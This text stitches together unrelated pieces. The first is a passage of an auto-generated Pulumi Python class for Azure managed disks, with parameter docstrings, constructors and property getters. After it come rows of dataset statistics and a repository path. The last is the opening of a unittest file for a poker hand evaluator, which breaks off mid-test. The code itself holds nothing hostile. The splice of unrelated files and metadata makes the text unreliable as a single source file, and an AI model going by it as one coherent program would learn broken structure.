create_option="Empty",
disk_size_gb=1,
tags={
"environment": "staging",
})
copy = azure.compute.ManagedDisk("copy",
location="West US 2",
resource_group_name=example.name,
storage_account_type="Standard_LRS",
create_option="Copy",
source_resource_id=source.id,
disk_size_gb=1,
tags={
"environment": "staging",
})
```
## Import
Managed Disks can be imported using the `resource id`, e.g.
```sh
$ pulumi import azure:compute/managedDisk:ManagedDisk example /subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/mygroup1/providers/microsoft.compute/disks/manageddisk1
```
:param str resource_name: The name of the resource.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[str] create_option: The method to use when creating the managed disk. Changing this forces a new resource to be created. Possible values include `Import` (Import a VHD file in to the managed disk (VHD specified with `source_uri`), `Empty` (Create an empty managed disk), `Copy` (Copy an existing managed disk or snapshot, specified with `source_resource_id`), `FromImage` (Copy a Platform Image, specified with `image_reference_id`), `Restore` (Set by Azure Backup or Site Recovery on a restored disk, specified with `source_resource_id`).
:param pulumi.Input[str] disk_access_id: The ID of the disk access resource for using private endpoints on disks.
:param pulumi.Input[str] disk_encryption_set_id: The ID of a Disk Encryption Set which should be used to encrypt this Managed Disk.
:param pulumi.Input[int] disk_iops_read_only: The number of IOPS allowed across all VMs mounting the shared disk as read-only; only settable for UltraSSD disks with shared disk enabled. One operation can transfer between 4k and 256k bytes.
:param pulumi.Input[int] disk_iops_read_write: The number of IOPS allowed for this disk; only settable for UltraSSD disks. One operation can transfer between 4k and 256k bytes.
:param pulumi.Input[int] disk_mbps_read_only: The bandwidth allowed across all VMs mounting the shared disk as read-only; only settable for UltraSSD disks with shared disk enabled. MBps means millions of bytes per second.
:param pulumi.Input[int] disk_mbps_read_write: The bandwidth allowed for this disk; only settable for UltraSSD disks. MBps means millions of bytes per second.
:param pulumi.Input[int] disk_size_gb: Specifies the size of the managed disk to create in gigabytes. If `create_option` is `Copy` or `FromImage`, then the value must be equal to or greater than the source's size. The size can only be increased.
:param pulumi.Input[pulumi.InputType['ManagedDiskEncryptionSettingsArgs']] encryption_settings: A `encryption_settings` block as defined below.
:param pulumi.Input[str] gallery_image_reference_id: ID of a Gallery Image Version to copy when `create_option` is `FromImage`. This field cannot be specified if image_reference_id is specified.
:param pulumi.Input[str] hyper_v_generation: The HyperV Generation of the Disk when the source of an `Import` or `Copy` operation targets a source that contains an operating system. Possible values are `V1` and `V2`. Changing this forces a new resource to be created.
:param pulumi.Input[str] image_reference_id: ID of an existing platform/marketplace disk image to copy when `create_option` is `FromImage`. This field cannot be specified if gallery_image_reference_id is specified.
:param pulumi.Input[str] location: Specified the supported Azure location where the resource exists. Changing this forces a new resource to be created.
:param pulumi.Input[int] logical_sector_size: Logical Sector Size. Possible values are: `512` and `4096`. Defaults to `4096`. Changing this forces a new resource to be created.
:param pulumi.Input[int] max_shares: The maximum number of VMs that can attach to the disk at the same time. Value greater than one indicates a disk that can be mounted on multiple VMs at the same time.
:param pulumi.Input[str] name: Specifies the name of the Managed Disk. Changing this forces a new resource to be created.
:param pulumi.Input[str] network_access_policy: Policy for accessing the disk via network. Allowed values are `AllowAll`, `AllowPrivate`, and `DenyAll`.
:param pulumi.Input[bool] on_demand_bursting_enabled: Specifies if On-Demand Bursting is enabled for the Managed Disk. Defaults to `false`.
:param pulumi.Input[str] os_type: Specify a value when the source of an `Import` or `Copy` operation targets a source that contains an operating system. Valid values are `Linux` or `Windows`.
:param pulumi.Input[bool] public_network_access_enabled: Whether it is allowed to access the disk via public network. Defaults to `true`.
:param pulumi.Input[str] resource_group_name: The name of the Resource Group where the Managed Disk should exist.
:param pulumi.Input[str] source_resource_id: The ID of an existing Managed Disk to copy `create_option` is `Copy` or the recovery point to restore when `create_option` is `Restore`
:param pulumi.Input[str] source_uri: URI to a valid VHD file to be used when `create_option` is `Import`.
:param pulumi.Input[str] storage_account_id: The ID of the Storage Account where the `source_uri` is located. Required when `create_option` is set to `Import`. Changing this forces a new resource to be created.
:param pulumi.Input[str] storage_account_type: The type of storage to use for the managed disk. Possible values are `Standard_LRS`, `StandardSSD_ZRS`, `Premium_LRS`, `Premium_ZRS`, `StandardSSD_LRS` or `UltraSSD_LRS`.
:param pulumi.Input[Mapping[str, pulumi.Input[str]]] tags: A mapping of tags to assign to the resource.
:param pulumi.Input[str] tier: The disk performance tier to use. Possible values are documented [here](https://docs.microsoft.com/en-us/azure/virtual-machines/disks-change-performance). This feature is currently supported only for premium SSDs.
:param pulumi.Input[bool] trusted_launch_enabled: Specifies if Trusted Launch is enabled for the Managed Disk. Defaults to `false`.
:param pulumi.Input[str] zones: A collection containing the availability zone to allocate the Managed Disk in.
"""
...
@overload
def __init__(__self__,
resource_name: str,
args: ManagedDiskArgs,
opts: Optional[pulumi.ResourceOptions] = None):
"""
Manages a managed disk.
## Example Usage
### With Create Empty
```python
import pulumi
import pulumi_azure as azure
example_resource_group = azure.core.ResourceGroup("exampleResourceGroup", location="West Europe")
example_managed_disk = azure.compute.ManagedDisk("exampleManagedDisk",
location="West US 2",
resource_group_name=example_resource_group.name,
storage_account_type="Standard_LRS",
create_option="Empty",
disk_size_gb=1,
tags={
"environment": "staging",
})
```
### With Create Copy
```python
import pulumi
import pulumi_azure as azure
example = azure.core.ResourceGroup("example", location="West Europe")
source = azure.compute.ManagedDisk("source",
location="West US 2",
resource_group_name=example.name,
storage_account_type="Standard_LRS",
create_option="Empty",
disk_size_gb=1,
tags={
"environment": "staging",
})
copy = azure.compute.ManagedDisk("copy",
location="West US 2",
resource_group_name=example.name,
storage_account_type="Standard_LRS",
create_option="Copy",
source_resource_id=source.id,
disk_size_gb=1,
tags={
"environment": "staging",
})
```
## Import
Managed Disks can be imported using the `resource id`, e.g.
```sh
$ pulumi import azure:compute/managedDisk:ManagedDisk example /subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/mygroup1/providers/microsoft.compute/disks/manageddisk1
```
:param str resource_name: The name of the resource.
:param ManagedDiskArgs args: The arguments to use to populate this resource's properties.
:param pulumi.ResourceOptions opts: Options for the resource.
"""
...
def __init__(__self__, resource_name: str, *args, **kwargs):
resource_args, opts = _utilities.get_resource_args_opts(ManagedDiskArgs, pulumi.ResourceOptions, *args, **kwargs)
if resource_args is not None:
__self__._internal_init(resource_name, opts, **resource_args.__dict__)
else:
__self__._internal_init(resource_name, *args, **kwargs)
def _internal_init(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
create_option: Optional[pulumi.Input[str]] = None,
disk_access_id: Optional[pulumi.Input[str]] = None,
disk_encryption_set_id: Optional[pulumi.Input[str]] = None,
disk_iops_read_only: Optional[pulumi.Input[int]] = None,
disk_iops_read_write: Optional[pulumi.Input[int]] = None,
disk_mbps_read_only: Optional[pulumi.Input[int]] = None,
disk_mbps_read_write: Optional[pulumi.Input[int]] = None,
disk_size_gb: Optional[pulumi.Input[int]] = None,
encryption_settings: Optional[pulumi.Input[pulumi.InputType['ManagedDiskEncryptionSettingsArgs']]] = None,
gallery_image_reference_id: Optional[pulumi.Input[str]] = None,
hyper_v_generation: Optional[pulumi.Input[str]] = None,
image_reference_id: Optional[pulumi.Input[str]] = None,
location: Optional[pulumi.Input[str]] = None,
logical_sector_size: Optional[pulumi.Input[int]] = None,
max_shares: Optional[pulumi.Input[int]] = None,
name: Optional[pulumi.Input[str]] = None,
network_access_policy: Optional[pulumi.Input[str]] = None,
on_demand_bursting_enabled: Optional[pulumi.Input[bool]] = None,
os_type: Optional[pulumi.Input[str]] = None,
public_network_access_enabled: Optional[pulumi.Input[bool]] = None,
resource_group_name: Optional[pulumi.Input[str]] = None,
source_resource_id: Optional[pulumi.Input[str]] = None,
source_uri: Optional[pulumi.Input[str]] = None,
storage_account_id: Optional[pulumi.Input[str]] = None,
storage_account_type: Optional[pulumi.Input[str]] = None,
tags: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
tier: Optional[pulumi.Input[str]] = None,
trusted_launch_enabled: Optional[pulumi.Input[bool]] = None,
zones: Optional[pulumi.Input[str]] = None,
__props__=None):
if opts is None:
opts = pulumi.ResourceOptions()
if not isinstance(opts, pulumi.ResourceOptions):
raise TypeError('Expected resource options to be a ResourceOptions instance')
if opts.version is None:
opts.version = _utilities.get_version()
if opts.id is None:
if __props__ is not None:
raise TypeError('__props__ is only valid when passed in combination with a valid opts.id to get an existing resource')
__props__ = ManagedDiskArgs.__new__(ManagedDiskArgs)
if create_option is None and not opts.urn:
raise TypeError("Missing required property 'create_option'")
__props__.__dict__["create_option"] = create_option
__props__.__dict__["disk_access_id"] = disk_access_id
__props__.__dict__["disk_encryption_set_id"] = disk_encryption_set_id
__props__.__dict__["disk_iops_read_only"] = disk_iops_read_only
__props__.__dict__["disk_iops_read_write"] = disk_iops_read_write
__props__.__dict__["disk_mbps_read_only"] = disk_mbps_read_only
__props__.__dict__["disk_mbps_read_write"] = disk_mbps_read_write
__props__.__dict__["disk_size_gb"] = disk_size_gb
__props__.__dict__["encryption_settings"] = encryption_settings
__props__.__dict__["gallery_image_reference_id"] = gallery_image_reference_id
__props__.__dict__["hyper_v_generation"] = hyper_v_generation
__props__.__dict__["image_reference_id"] = image_reference_id
__props__.__dict__["location"] = location
__props__.__dict__["logical_sector_size"] = logical_sector_size
__props__.__dict__["max_shares"] = max_shares
__props__.__dict__["name"] = name
__props__.__dict__["network_access_policy"] = network_access_policy
__props__.__dict__["on_demand_bursting_enabled"] = on_demand_bursting_enabled
__props__.__dict__["os_type"] = os_type
__props__.__dict__["public_network_access_enabled"] = public_network_access_enabled
if resource_group_name is None and not opts.urn:
raise TypeError("Missing required property 'resource_group_name'")
__props__.__dict__["resource_group_name"] = resource_group_name
__props__.__dict__["source_resource_id"] = source_resource_id
__props__.__dict__["source_uri"] = source_uri
__props__.__dict__["storage_account_id"] = storage_account_id
if storage_account_type is None and not opts.urn:
raise TypeError("Missing required property 'storage_account_type'")
__props__.__dict__["storage_account_type"] = storage_account_type
__props__.__dict__["tags"] = tags
__props__.__dict__["tier"] = tier
__props__.__dict__["trusted_launch_enabled"] = trusted_launch_enabled
__props__.__dict__["zones"] = zones
super(ManagedDisk, __self__).__init__(
'azure:compute/managedDisk:ManagedDisk',
resource_name,
__props__,
opts)
@staticmethod
def get(resource_name: str,
id: pulumi.Input[str],
opts: Optional[pulumi.ResourceOptions] = None,
create_option: Optional[pulumi.Input[str]] = None,
disk_access_id: Optional[pulumi.Input[str]] = None,
disk_encryption_set_id: Optional[pulumi.Input[str]] = None,
disk_iops_read_only: Optional[pulumi.Input[int]] = None,
disk_iops_read_write: Optional[pulumi.Input[int]] = None,
disk_mbps_read_only: Optional[pulumi.Input[int]] = None,
disk_mbps_read_write: Optional[pulumi.Input[int]] = None,
disk_size_gb: Optional[pulumi.Input[int]] = None,
encryption_settings: Optional[pulumi.Input[pulumi.InputType['ManagedDiskEncryptionSettingsArgs']]] = None,
gallery_image_reference_id: Optional[pulumi.Input[str]] = None,
hyper_v_generation: Optional[pulumi.Input[str]] = None,
image_reference_id: Optional[pulumi.Input[str]] = None,
location: Optional[pulumi.Input[str]] = None,
logical_sector_size: Optional[pulumi.Input[int]] = None,
max_shares: Optional[pulumi.Input[int]] = None,
name: Optional[pulumi.Input[str]] = None,
network_access_policy: Optional[pulumi.Input[str]] = None,
on_demand_bursting_enabled: Optional[pulumi.Input[bool]] = None,
os_type: Optional[pulumi.Input[str]] = None,
public_network_access_enabled: Optional[pulumi.Input[bool]] = None,
resource_group_name: Optional[pulumi.Input[str]] = None,
source_resource_id: Optional[pulumi.Input[str]] = None,
source_uri: Optional[pulumi.Input[str]] = None,
storage_account_id: Optional[pulumi.Input[str]] = None,
storage_account_type: Optional[pulumi.Input[str]] = None,
tags: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
tier: Optional[pulumi.Input[str]] = None,
trusted_launch_enabled: Optional[pulumi.Input[bool]] = None,
zones: Optional[pulumi.Input[str]] = None) -> 'ManagedDisk':
"""
Get an existing ManagedDisk resource's state with the given name, id, and optional extra
properties used to qualify the lookup.
:param str resource_name: The unique name of the resulting resource.
:param pulumi.Input[str] id: The unique provider ID of the resource to lookup.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[str] create_option: The method to use when creating the managed disk. Changing this forces a new resource to be created. Possible values include `Import` (Import a VHD file in to the managed disk (VHD specified with `source_uri`), `Empty` (Create an empty managed disk), `Copy` (Copy an existing managed disk or snapshot, specified with `source_resource_id`), `FromImage` (Copy a Platform Image, specified with `image_reference_id`), `Restore` (Set by Azure Backup or Site Recovery on a restored disk, specified with `source_resource_id`).
:param pulumi.Input[str] disk_access_id: The ID of the disk access resource for using private endpoints on disks.
:param pulumi.Input[str] disk_encryption_set_id: The ID of a Disk Encryption Set which should be used to encrypt this Managed Disk.
:param pulumi.Input[int] disk_iops_read_only: The number of IOPS allowed across all VMs mounting the shared disk as read-only; only settable for UltraSSD disks with shared disk enabled. One operation can transfer between 4k and 256k bytes.
:param pulumi.Input[int] disk_iops_read_write: The number of IOPS allowed for this disk; only settable for UltraSSD disks. One operation can transfer between 4k and 256k bytes.
:param pulumi.Input[int] disk_mbps_read_only: The bandwidth allowed across all VMs mounting the shared disk as read-only; only settable for UltraSSD disks with shared disk enabled. MBps means millions of bytes per second.
:param pulumi.Input[int] disk_mbps_read_write: The bandwidth allowed for this disk; only settable for UltraSSD disks. MBps means millions of bytes per second.
:param pulumi.Input[int] disk_size_gb: Specifies the size of the managed disk to create in gigabytes. If `create_option` is `Copy` or `FromImage`, then the value must be equal to or greater than the source's size. The size can only be increased.
:param pulumi.Input[pulumi.InputType['ManagedDiskEncryptionSettingsArgs']] encryption_settings: A `encryption_settings` block as defined below.
:param pulumi.Input[str] gallery_image_reference_id: ID of a Gallery Image Version to copy when `create_option` is `FromImage`. This field cannot be specified if image_reference_id is specified.
:param pulumi.Input[str] hyper_v_generation: The HyperV Generation of the Disk when the source of an `Import` or `Copy` operation targets a source that contains an operating system. Possible values are `V1` and `V2`. Changing this forces a new resource to be created.
:param pulumi.Input[str] image_reference_id: ID of an existing platform/marketplace disk image to copy when `create_option` is `FromImage`. This field cannot be specified if gallery_image_reference_id is specified.
:param pulumi.Input[str] location: Specified the supported Azure location where the resource exists. Changing this forces a new resource to be created.
:param pulumi.Input[int] logical_sector_size: Logical Sector Size. Possible values are: `512` and `4096`. Defaults to `4096`. Changing this forces a new resource to be created.
:param pulumi.Input[int] max_shares: The maximum number of VMs that can attach to the disk at the same time. Value greater than one indicates a disk that can be mounted on multiple VMs at the same time.
:param pulumi.Input[str] name: Specifies the name of the Managed Disk. Changing this forces a new resource to be created.
:param pulumi.Input[str] network_access_policy: Policy for accessing the disk via network. Allowed values are `AllowAll`, `AllowPrivate`, and `DenyAll`.
:param pulumi.Input[bool] on_demand_bursting_enabled: Specifies if On-Demand Bursting is enabled for the Managed Disk. Defaults to `false`.
:param pulumi.Input[str] os_type: Specify a value when the source of an `Import` or `Copy` operation targets a source that contains an operating system. Valid values are `Linux` or `Windows`.
:param pulumi.Input[bool] public_network_access_enabled: Whether it is allowed to access the disk via public network. Defaults to `true`.
:param pulumi.Input[str] resource_group_name: The name of the Resource Group where the Managed Disk should exist.
:param pulumi.Input[str] source_resource_id: The ID of an existing Managed Disk to copy `create_option` is `Copy` or the recovery point to restore when `create_option` is `Restore`
:param pulumi.Input[str] source_uri: URI to a valid VHD file to be used when `create_option` is `Import`.
:param pulumi.Input[str] storage_account_id: The ID of the Storage Account where the `source_uri` is located. Required when `create_option` is set to `Import`. Changing this forces a new resource to be created.
:param pulumi.Input[str] storage_account_type: The type of storage to use for the managed disk. Possible values are `Standard_LRS`, `StandardSSD_ZRS`, `Premium_LRS`, `Premium_ZRS`, `StandardSSD_LRS` or `UltraSSD_LRS`.
:param pulumi.Input[Mapping[str, pulumi.Input[str]]] tags: A mapping of tags to assign to the resource.
:param pulumi.Input[str] tier: The disk performance tier to use. Possible values are documented [here](https://docs.microsoft.com/en-us/azure/virtual-machines/disks-change-performance). This feature is currently supported only for premium SSDs.
:param pulumi.Input[bool] trusted_launch_enabled: Specifies if Trusted Launch is enabled for the Managed Disk. Defaults to `false`.
:param pulumi.Input[str] zones: A collection containing the availability zone to allocate the Managed Disk in.
"""
opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))
__props__ = _ManagedDiskState.__new__(_ManagedDiskState)
__props__.__dict__["create_option"] = create_option
__props__.__dict__["disk_access_id"] = disk_access_id
__props__.__dict__["disk_encryption_set_id"] = disk_encryption_set_id
__props__.__dict__["disk_iops_read_only"] = disk_iops_read_only
__props__.__dict__["disk_iops_read_write"] = disk_iops_read_write
__props__.__dict__["disk_mbps_read_only"] = disk_mbps_read_only
__props__.__dict__["disk_mbps_read_write"] = disk_mbps_read_write
__props__.__dict__["disk_size_gb"] = disk_size_gb
__props__.__dict__["encryption_settings"] = encryption_settings
__props__.__dict__["gallery_image_reference_id"] = gallery_image_reference_id
__props__.__dict__["hyper_v_generation"] = hyper_v_generation
__props__.__dict__["image_reference_id"] = image_reference_id
__props__.__dict__["location"] = location
__props__.__dict__["logical_sector_size"] = logical_sector_size
__props__.__dict__["max_shares"] = max_shares
__props__.__dict__["name"] = name
__props__.__dict__["network_access_policy"] = network_access_policy
__props__.__dict__["on_demand_bursting_enabled"] = on_demand_bursting_enabled
__props__.__dict__["os_type"] = os_type
__props__.__dict__["public_network_access_enabled"] = public_network_access_enabled
__props__.__dict__["resource_group_name"] = resource_group_name
__props__.__dict__["source_resource_id"] = source_resource_id
__props__.__dict__["source_uri"] = source_uri
__props__.__dict__["storage_account_id"] = storage_account_id
__props__.__dict__["storage_account_type"] = storage_account_type
__props__.__dict__["tags"] = tags
__props__.__dict__["tier"] = tier
__props__.__dict__["trusted_launch_enabled"] = trusted_launch_enabled
__props__.__dict__["zones"] = zones
return ManagedDisk(resource_name, opts=opts, __props__=__props__)
@property
@pulumi.getter(name="createOption")
def create_option(self) -> pulumi.Output[str]:
"""
The method to use when creating the managed disk. Changing this forces a new resource to be created. Possible values include `Import` (Import a VHD file in to the managed disk (VHD specified with `source_uri`), `Empty` (Create an empty managed disk), `Copy` (Copy an existing managed disk or snapshot, specified with `source_resource_id`), `FromImage` (Copy a Platform Image, specified with `image_reference_id`), `Restore` (Set by Azure Backup or Site Recovery on a restored disk, specified with `source_resource_id`).
"""
return pulumi.get(self, "create_option")
@property
@pulumi.getter(name="diskAccessId")
def disk_access_id(self) -> pulumi.Output[Optional[str]]:
"""
The ID of the disk access resource for using private endpoints on disks.
"""
return pulumi.get(self, "disk_access_id")
@property
@pulumi.getter(name="diskEncryptionSetId")
def disk_encryption_set_id(self) -> pulumi.Output[Optional[str]]:
"""
The ID of a Disk Encryption Set which should be used to encrypt this Managed Disk.
"""
return pulumi.get(self, "disk_encryption_set_id")
@property
@pulumi.getter(name="diskIopsReadOnly")
def disk_iops_read_only(self) -> pulumi.Output[int]:
"""
The number of IOPS allowed across all VMs mounting the shared disk as read-only; only settable for UltraSSD disks with shared disk enabled. One operation can transfer between 4k and 256k bytes.
"""
return pulumi.get(self, "disk_iops_read_only")
@property
@pulumi.getter(name="diskIopsReadWrite")
def disk_iops_read_write(self) -> pulumi.Output[int]:
"""
The number of IOPS allowed for this disk; only settable for UltraSSD disks. One operation can transfer between 4k and 256k bytes.
"""
return pulumi.get(self, "disk_iops_read_write")
@property
@pulumi.getter(name="diskMbpsReadOnly")
def disk_mbps_read_only(self) -> pulumi.Output[int]:
"""
The bandwidth allowed across all VMs mounting the shared disk as read-only; only settable for UltraSSD disks with shared disk enabled. MBps means millions of bytes per second.
"""
return pulumi.get(self, "disk_mbps_read_only")
@property
@pulumi.getter(name="diskMbpsReadWrite")
def disk_mbps_read_write(self) -> pulumi.Output[int]:
"""
The bandwidth allowed for this disk; only settable for UltraSSD disks. MBps means millions of bytes per second.
"""
return pulumi.get(self, "disk_mbps_read_write")
@property
@pulumi.getter(name="diskSizeGb")
def disk_size_gb(self) -> pulumi.Output[int]:
"""
Specifies the size of the managed disk to create in gigabytes. If `create_option` is `Copy` or `FromImage`, then the value must be equal to or greater than the source's size. The size can only be increased.
"""
return pulumi.get(self, "disk_size_gb")
@property
@pulumi.getter(name="encryptionSettings")
def encryption_settings(self) -> pulumi.Output[Optional['outputs.ManagedDiskEncryptionSettings']]:
"""
A `encryption_settings` block as defined below.
"""
return pulumi.get(self, "encryption_settings")
@property
@pulumi.getter(name="galleryImageReferenceId")
def gallery_image_reference_id(self) -> pulumi.Output[Optional[str]]:
"""
ID of a Gallery Image Version to copy when `create_option` is `FromImage`. This field cannot be specified if image_reference_id is specified.
"""
return pulumi.get(self, "gallery_image_reference_id")
@property
@pulumi.getter(name="hyperVGeneration")
def hyper_v_generation(self) -> pulumi.Output[Optional[str]]:
"""
The HyperV Generation of the Disk when the source of an `Import` or `Copy` operation targets a source that contains an operating system. Possible values are `V1` and `V2`. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "hyper_v_generation")
@property
@pulumi.getter(name="imageReferenceId")
def image_reference_id(self) -> pulumi.Output[Optional[str]]:
"""
ID of an existing platform/marketplace disk image to copy when `create_option` is `FromImage`. This field cannot be specified if gallery_image_reference_id is specified.
"""
return pulumi.get(self, "image_reference_id")
@property
@pulumi.getter
def location(self) -> pulumi.Output[str]:
"""
Specified the supported Azure location where the resource exists. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "location")
@property
@pulumi.getter(name="logicalSectorSize")
def logical_sector_size(self) -> pulumi.Output[int]:
"""
Logical Sector Size. Possible values are: `512` and `4096`. Defaults to `4096`. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "logical_sector_size")
@property
@pulumi.getter(name="maxShares")
def max_shares(self) -> pulumi.Output[int]:
"""
The maximum number of VMs that can attach to the disk at the same time. Value greater than one indicates a disk that can be mounted on multiple VMs at the same time.
"""
return pulumi.get(self, "max_shares")
@property
@pulumi.getter
def name(self) -> pulumi.Output[str]:
"""
Specifies the name of the Managed Disk. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "name")
@property
@pulumi.getter(name="networkAccessPolicy")
def network_access_policy(self) -> pulumi.Output[Optional[str]]:
"""
Policy for accessing the disk via network. Allowed values are `AllowAll`, `AllowPrivate`, and `DenyAll`.
"""
return pulumi.get(self, "network_access_policy")
@property
@pulumi.getter(name="onDemandBurstingEnabled")
def on_demand_bursting_enabled(self) -> pulumi.Output[Optional[bool]]:
"""
Specifies if On-Demand Bursting is enabled for the Managed Disk. Defaults to `false`.
"""
return pulumi.get(self, "on_demand_bursting_enabled")
@property
@pulumi.getter(name="osType")
def os_type(self) -> pulumi.Output[Optional[str]]:
"""
Specify a value when the source of an `Import` or `Copy` operation targets a source that contains an operating system. Valid values are `Linux` or `Windows`.
"""
return pulumi.get(self, "os_type")
@property
@pulumi.getter(name="publicNetworkAccessEnabled")
def public_network_access_enabled(self) -> pulumi.Output[Optional[bool]]:
"""
Whether it is allowed to access the disk via public network. Defaults to `true`.
"""
return pulumi.get(self, "public_network_access_enabled")
@property
@pulumi.getter(name="resourceGroupName")
def resource_group_name(self) -> pulumi.Output[str]:
"""
The name of the Resource Group where the Managed Disk should exist.
"""
return pulumi.get(self, "resource_group_name")
@property
@pulumi.getter(name="sourceResourceId")
def source_resource_id(self) -> pulumi.Output[Optional[str]]:
"""
The ID of an existing Managed Disk to copy `create_option` is `Copy` or the recovery point to restore when `create_option` is `Restore`
"""
return pulumi.get(self, "source_resource_id")
@property
@pulumi.getter(name="sourceUri")
def source_uri(self) -> pulumi.Output[str]:
"""
URI to a valid VHD file to be used when `create_option` is `Import`.
"""
return pulumi.get(self, "source_uri")
@property
@pulumi.getter(name="storageAccountId")
def storage_account_id(self) -> pulumi.Output[Optional[str]]:
"""
The ID of the Storage Account where the `source_uri` is located. Required when `create_option` is set to `Import`. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "storage_account_id")
@property
@pulumi.getter(name="storageAccountType")
def storage_account_type(self) -> pulumi.Output[str]:
"""
The type of storage to use for the managed disk. Possible values are `Standard_LRS`, `StandardSSD_ZRS`, `Premium_LRS`, `Premium_ZRS`, `StandardSSD_LRS` or `UltraSSD_LRS`.
"""
return pulumi.get(self, "storage_account_type")
@property
@pulumi.getter
def tags(self) -> pulumi.Output[Optional[Mapping[str, str]]]:
"""
A mapping of tags to assign to the resource.
"""
return pulumi.get(self, "tags")
@property
@pulumi.getter
def tier(self) -> pulumi.Output[str]:
"""
The disk performance tier to use. Possible values are documented [here](https://docs.microsoft.com/en-us/azure/virtual-machines/disks-change-performance). This feature is currently supported only for premium SSDs.
"""
return pulumi.get(self, "tier")
@property
@pulumi.getter(name="trustedLaunchEnabled")
def trusted_launch_enabled(self) -> pulumi.Output[Optional[bool]]:
"""
Specifies if Trusted Launch is enabled for the Managed Disk. Defaults to `false`.
"""
return pulumi.get(self, "trusted_launch_enabled")
@property
@pulumi.getter
def zones(self) -> pulumi.Output[Optional[str]]:
"""
A collection containing the availability zone to allocate the Managed Disk in.
"""
return pulumi.get(self, "zones")
| 56.724794
| 567
| 0.687418
| 11,701
| 89,455
| 5.025895
| 0.029912
| 0.073697
| 0.081417
| 0.05387
| 0.970293
| 0.964818
| 0.959546
| 0.956417
| 0.954751
| 0.948391
| 0
| 0.003263
| 0.218825
| 89,455
| 1,576
| 568
| 56.760787
| 0.838294
| 0.418881
| 0
| 0.894795
| 1
| 0
| 0.125519
| 0.040392
| 0
| 0
| 0
| 0
| 0
| 1
| 0.168328
| false
| 0.001107
| 0.007752
| 0
| 0.276855
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
7134798ad8fd291a01a5ad4a7e804d71864736c5
| 7,469
|
py
|
Python
|
tests/test_hands_helper.py
|
Bartosz-D3V/Poker_Hand_Selector
|
efa2f70f686543c464df4106f68233b3c133bee9
|
[
"MIT"
] | null | null | null |
tests/test_hands_helper.py
|
Bartosz-D3V/Poker_Hand_Selector
|
efa2f70f686543c464df4106f68233b3c133bee9
|
[
"MIT"
] | null | null | null |
tests/test_hands_helper.py
|
Bartosz-D3V/Poker_Hand_Selector
|
efa2f70f686543c464df4106f68233b3c133bee9
|
[
"MIT"
] | null | null | null |
import unittest
from hand_selector.domain.card import Card
from hand_selector.domain.deck_suite import DeckSuite
from hand_selector.domain.deck_value import DeckValue
from hand_selector.hands_helper import HandsHelper
class TestHandsHelper(unittest.TestCase):
def test_is_straight_should_return_true_if_cards_are_ordered(self):
card1 = Card(DeckSuite.TILES, DeckValue.SIX)
card2 = Card(DeckSuite.TILES, DeckValue.SEVEN)
card3 = Card(DeckSuite.HEARTS, DeckValue.EIGHT)
card4 = Card(DeckSuite.TILES, DeckValue.NINE)
card5 = Card(DeckSuite.CLOVERS, DeckValue.TEN)
self.assertTrue(HandsHelper.is_straight(card1, card2, card3, card4, card5))
card6 = Card(DeckSuite.TILES, DeckValue.TEN)
card7 = Card(DeckSuite.TILES, DeckValue.JACK)
card8 = Card(DeckSuite.HEARTS, DeckValue.QUEEN)
card9 = Card(DeckSuite.TILES, DeckValue.KING)
card10 = Card(DeckSuite.CLOVERS, DeckValue.ACE)
self.assertTrue(HandsHelper.is_straight(card6, card7, card8, card9, card10))
def test_is_straight_should_return_false(self):
card1 = Card(DeckSuite.TILES, DeckValue.TWO)
card2 = Card(DeckSuite.TILES, DeckValue.THREE)
card3 = Card(DeckSuite.TILES, DeckValue.EIGHT)
card4 = Card(DeckSuite.TILES, DeckValue.NINE)
card5 = Card(DeckSuite.CLOVERS, DeckValue.ACE)
self.assertFalse(HandsHelper.is_straight(card1, card2, card3, card4, card5))
def test_is_flush_should_return_true_if_cards_are_of_one_kind(self):
card1 = Card(DeckSuite.TILES, DeckValue.TWO)
card2 = Card(DeckSuite.TILES, DeckValue.THREE)
card3 = Card(DeckSuite.TILES, DeckValue.EIGHT)
card4 = Card(DeckSuite.TILES, DeckValue.NINE)
card5 = Card(DeckSuite.TILES, DeckValue.ACE)
self.assertTrue(HandsHelper.is_flush(card1, card2, card3, card4, card5))
def test_is_flush_should_return_false(self):
card1 = Card(DeckSuite.TILES, DeckValue.TWO)
card2 = Card(DeckSuite.TILES, DeckValue.THREE)
card3 = Card(DeckSuite.TILES, DeckValue.SEVEN)
card4 = Card(DeckSuite.HEARTS, DeckValue.JACK)
card5 = Card(DeckSuite.TILES, DeckValue.ACE)
self.assertFalse(HandsHelper.is_flush(card1, card2, card3, card4, card5))
def test_is_royal_flush_should_return_true_if_deck_is_flush_and_straight_flush(
self
):
card1 = Card(DeckSuite.TILES, DeckValue.TEN)
card2 = Card(DeckSuite.TILES, DeckValue.JACK)
card3 = Card(DeckSuite.TILES, DeckValue.QUEEN)
card4 = Card(DeckSuite.TILES, DeckValue.KING)
card5 = Card(DeckSuite.TILES, DeckValue.ACE)
self.assertTrue(HandsHelper.is_royal_flush(card1, card2, card3, card4, card5))
def test_is_royal_flush_should_return_false(self):
card1 = Card(DeckSuite.TILES, DeckValue.TEN)
card2 = Card(DeckSuite.TILES, DeckValue.JACK)
card3 = Card(DeckSuite.TILES, DeckValue.TWO)
card4 = Card(DeckSuite.TILES, DeckValue.KING)
card5 = Card(DeckSuite.TILES, DeckValue.ACE)
self.assertFalse(HandsHelper.is_royal_flush(card1, card2, card3, card4, card5))
def test_is_four_of_kind_should_return_true_for_four_cards_with_same_values(self):
card1 = Card(DeckSuite.CLOVERS, DeckValue.JACK)
